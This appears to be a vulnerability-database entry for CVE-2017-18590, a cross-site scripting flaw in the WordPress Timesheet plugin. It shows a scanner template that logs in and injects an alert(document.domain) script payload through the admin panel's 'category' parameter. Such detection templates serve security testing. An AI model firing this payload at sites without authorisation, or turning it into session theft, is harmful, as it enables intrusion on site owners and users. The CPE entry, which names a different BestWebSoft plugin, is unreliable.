CVE-2017-18590: Timesheet Plugin < 0.1.5 - Cross-Site Scripting

2025-08-01 Timesheet Plugin PoC Public

Description

The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues.

PoC

id: CVE-2017-18590

info:
  name: Timesheet Plugin < 0.1.5 - Cross-Site Scripting
  author: Splint3r7
  severity: medium
  description: |
    The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Update to version 0.1.5 or later.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18590
    - https://downloads.wordpress.org/plugin/timesheet
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18590
    cwe-id: CWE-79
    epss-score: 0.01404
    epss-percentile: 0.71208
    cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: bestwebsoft
    product: timesheet
    framework: wordpress
  tags: cve,cve2017,wordpress,wp,wp-plugin,bws-promobar,xss,authenticated,timesheet,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/timesheet")'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
        condition: and
# digest: 4b0a00483046022100ea1ff80c9d42094365f9ddfbee558b1f3582d436430ab567be0b49706f93ac45022100fdf2377e36986e6d7664cd6997614c7ad8a1ba978ef6fefe92c38f96df8f0f8b:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities